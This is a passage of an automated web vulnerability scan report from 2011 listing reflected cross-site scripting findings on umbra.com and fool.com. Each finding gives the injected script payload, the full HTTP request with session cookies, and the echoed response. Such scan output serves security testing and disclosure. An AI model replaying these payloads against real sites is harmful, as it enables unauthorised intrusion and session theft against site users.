Content-Type: text/html; charset=UTF-8
Content-Length: 1624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<form id="damnform" action="/local/pressimages/index.php/" stYledbdd8><script>alert(1)</script>aebc7dde785="x:expre/**/ssion(netsparker(9))" method="post">
...[SNIP]...

3.44. http://www.umbra.com/local/pressimages/index.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9)) [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.umbra.com
Path:	/local/pressimages/index.php/%22%20stYle=%22x:expre//ssion(netsparker(9))**

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9925"><script>alert(1)</script>1407e438f9e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /local/pressimages/index.php/b9925"><script>alert(1)</script>1407e438f9e=%22x:expre/**/ssion(netsparker(9)) HTTP/1.1
Host: www.umbra.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 02:43:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=dj2qu9acegm0uih3t99g4m67q0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<form id="damnform" action="/local/pressimages/index.php/b9925"><script>alert(1)</script>1407e438f9e="x:expre/**/ssion(netsparker(9))" method="post">
...[SNIP]...

3.45. http://www.umbra.com/local/pressimages/index.php/%22%20stYle=%22x:expre/**/style/style.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.umbra.com
Path:	/local/pressimages/index.php/%22%20stYle=%22x:expre//style/style.css**

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fb23"><script>alert(1)</script>816bb3664f2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /local/pressimages/index.php/7fb23"><script>alert(1)</script>816bb3664f2=%22x:expre/**/style/style.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.umbra.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 02:40:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=vrt276jev1s2qf0hlhjtrplj80; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<form id="damnform" action="/local/pressimages/index.php/7fb23"><script>alert(1)</script>816bb3664f2="x:expre/**/style/style.css" method="post">
...[SNIP]...

3.46. http://www.umbra.com/local/pressimages/index.php/%22%20stYle=%22x:expre/**/style/style.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.umbra.com
Path:	/local/pressimages/index.php/%22%20stYle=%22x:expre//style/style.css**

Issue detail

The value of REST URL parameter 4 is copied into the name of an HTML tag attribute. The payload f1b86><script>alert(1)</script>e09dbc81adc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /local/pressimages/index.php/%22%20stYlef1b86><script>alert(1)</script>e09dbc81adc=%22x:expre/**/style/style.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.umbra.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 02:40:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=etbajl6verehnfkno1to91htb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<form id="damnform" action="/local/pressimages/index.php/" stYlef1b86><script>alert(1)</script>e09dbc81adc="x:expre/**/style/style.css" method="post">
...[SNIP]...

3.47. http://www.umbra.com/local/pressimages/index.php/style/style.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.umbra.com
Path:	/local/pressimages/index.php/style/style.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3982"><script>alert(1)</script>1d04cf31f1d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /local/pressimages/index.php/stylec3982"><script>alert(1)</script>1d04cf31f1d/style.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.umbra.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 02:40:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=n3ce02on85ke8lcapqeq5v9nh1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<form id="damnform" action="/local/pressimages/index.php/stylec3982"><script>alert(1)</script>1d04cf31f1d/style.css" method="post">
...[SNIP]...

3.48. http://www.umbra.com/local/pressimages/index.php/style/style.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.umbra.com
Path:	/local/pressimages/index.php/style/style.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42e5c"><script>alert(1)</script>15b1a5fc335 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /local/pressimages/index.php/style/style.css42e5c"><script>alert(1)</script>15b1a5fc335 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.umbra.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 02:40:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=le1alio5e36s2l4rqkuac47e26; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<form id="damnform" action="/local/pressimages/index.php/style/style.css42e5c"><script>alert(1)</script>15b1a5fc335" method="post">
...[SNIP]...

3.49. http://www.umbra.com/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style/style.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.umbra.com
Path:	/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style/style.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload fc1d9%3balert(1)//75e625b55a1 was submitted in the REST URL parameter 4. This input was echoed as fc1d9;alert(1)//75e625b55a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3Cfc1d9%3balert(1)//75e625b55a1/script%3E1d04cf31f1d/style/style.css HTTP/1.1
Host: www.umbra.com
Proxy-Connection: keep-alive
Referer: http://www.umbra.com/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style.css
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B70666F83050802D350F503E395F2C6C; __utmz=186317229.1303400866.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); country=US; __utma=186317229.275961606.1303400866.1303400866.1303400866.1; __utmc=186317229; __utmb=186317229.3.10.1303400866; PHPSESSID=gs5sgp11b7f9ej9d1a6u8749a7

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 02:57:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<fc1d9;alert(1)//75e625b55a1/script>
...[SNIP]...

3.50. http://www.umbra.com/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style/style.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.umbra.com
Path:	/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style/style.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83926"><script>alert(1)</script>5e773c2b878 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /local/pressimages/index.php/83926"><script>alert(1)</script>5e773c2b878/script%3E1d04cf31f1d/style/style.css HTTP/1.1
Host: www.umbra.com
Proxy-Connection: keep-alive
Referer: http://www.umbra.com/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style.css
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B70666F83050802D350F503E395F2C6C; __utmz=186317229.1303400866.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); country=US; __utma=186317229.275961606.1303400866.1303400866.1303400866.1; __utmc=186317229; __utmb=186317229.3.10.1303400866; PHPSESSID=gs5sgp11b7f9ej9d1a6u8749a7

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 02:57:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<form id="damnform" action="/local/pressimages/index.php/83926"><script>alert(1)</script>5e773c2b878/script>
...[SNIP]...

3.51. http://www.umbra.com/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style/style.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.umbra.com
Path:	/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style/style.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c3c64<script>alert(1)</script>5e2d5f69325 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1dc3c64<script>alert(1)</script>5e2d5f69325/style/style.css HTTP/1.1
Host: www.umbra.com
Proxy-Connection: keep-alive
Referer: http://www.umbra.com/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style.css
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B70666F83050802D350F503E395F2C6C; __utmz=186317229.1303400866.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); country=US; __utma=186317229.275961606.1303400866.1303400866.1303400866.1; __utmc=186317229; __utmb=186317229.3.10.1303400866; PHPSESSID=gs5sgp11b7f9ej9d1a6u8749a7

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 02:57:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
</script>1d04cf31f1dc3c64<script>alert(1)</script>5e2d5f69325/style/style.css" method="post">
...[SNIP]...

3.52. http://www.umbra.com/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style/style.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.umbra.com
Path:	/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style/style.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6ef05%3balert(1)//ef8ba9697a9 was submitted in the REST URL parameter 5. This input was echoed as 6ef05;alert(1)//ef8ba9697a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/6ef05%3balert(1)//ef8ba9697a9/style/style.css HTTP/1.1
Host: www.umbra.com
Proxy-Connection: keep-alive
Referer: http://www.umbra.com/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style.css
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B70666F83050802D350F503E395F2C6C; __utmz=186317229.1303400866.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); country=US; __utma=186317229.275961606.1303400866.1303400866.1303400866.1; __utmc=186317229; __utmb=186317229.3.10.1303400866; PHPSESSID=gs5sgp11b7f9ej9d1a6u8749a7

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 02:57:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
</6ef05;alert(1)//ef8ba9697a9/style/style.css" method="post">
...[SNIP]...

3.53. http://www.umbra.com/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style/style.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.umbra.com
Path:	/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style/style.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 50fe8<script>alert(1)</script>df48210040d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style50fe8<script>alert(1)</script>df48210040d/style.css HTTP/1.1
Host: www.umbra.com
Proxy-Connection: keep-alive
Referer: http://www.umbra.com/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style.css
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B70666F83050802D350F503E395F2C6C; __utmz=186317229.1303400866.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); country=US; __utma=186317229.275961606.1303400866.1303400866.1303400866.1; __utmc=186317229; __utmb=186317229.3.10.1303400866; PHPSESSID=gs5sgp11b7f9ej9d1a6u8749a7

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 02:57:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
</script>1d04cf31f1d/style50fe8<script>alert(1)</script>df48210040d/style.css" method="post">
...[SNIP]...

3.54. http://www.umbra.com/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style/style.css [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.umbra.com
Path:	/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style/style.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload e5fe4<script>alert(1)</script>60e51af352e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style/style.csse5fe4<script>alert(1)</script>60e51af352e HTTP/1.1
Host: www.umbra.com
Proxy-Connection: keep-alive
Referer: http://www.umbra.com/local/pressimages/index.php/stylec3982%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1d04cf31f1d/style.css
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B70666F83050802D350F503E395F2C6C; __utmz=186317229.1303400866.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); country=US; __utma=186317229.275961606.1303400866.1303400866.1303400866.1; __utmc=186317229; __utmb=186317229.3.10.1303400866; PHPSESSID=gs5sgp11b7f9ej9d1a6u8749a7

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 02:57:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
</script>1d04cf31f1d/style/style.csse5fe4<script>alert(1)</script>60e51af352e" method="post">
...[SNIP]...

3.55. http://www.umbra.com/ustore/login.site [redirect-url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.umbra.com
Path:	/ustore/login.site

Issue detail

The value of the redirect-url request parameter is copied into the HTML document as plain text between tags. The payload 3440f<script>alert(1)</script>d1403d0b85 was submitted in the redirect-url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ustore/login.site?redirect-url=/ustore/product/020183-094.store%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x001710)%3C%2Fscript%3E3440f<script>alert(1)</script>d1403d0b85 HTTP/1.1
Host: www.umbra.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=i60287q2tl2t9n774bnp8aap13

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 02:48:32 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: JSESSIONID=D5BB213E5A3CA03827C8811362A996E5; Path=/
Set-Cookie: country=US; Expires=Tue, 09-May-2079 06:02:39 GMT; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 13676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
</script>3440f<script>alert(1)</script>d1403d0b85" method="post">
...[SNIP]...

3.56. http://www.fool.com/favicon.ico [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.fool.com
Path:	/favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4795"><script>alert(1)</script>19e101a4cb2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fool.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=e4795"><script>alert(1)</script>19e101a4cb2

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
Set-Cookie: Sookie=source=&fy=false&ybls=0; domain=.fool.com; path=/
Set-Cookie: Wookie=Ref=http%3a%2f%2fwww.google.com%2fsearch%3fhl%3den%26q%3de4795%2522%253e%253cscript%253ealert(1)%253c%2fscript%253e19e101a4cb2; domain=.fool.com; expires=Fri, 22-Apr-2011 02:28:41 GMT; path=/
P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
Set-Cookie: Sookie=bm=&source=; domain=.fool.com; path=/
Set-Cookie: Wookie=Ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3De4795%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E19e101a4cb2; expires=Fri, 22-Apr-2011 02:28:40 GMT; domain=.fool.com; path=/
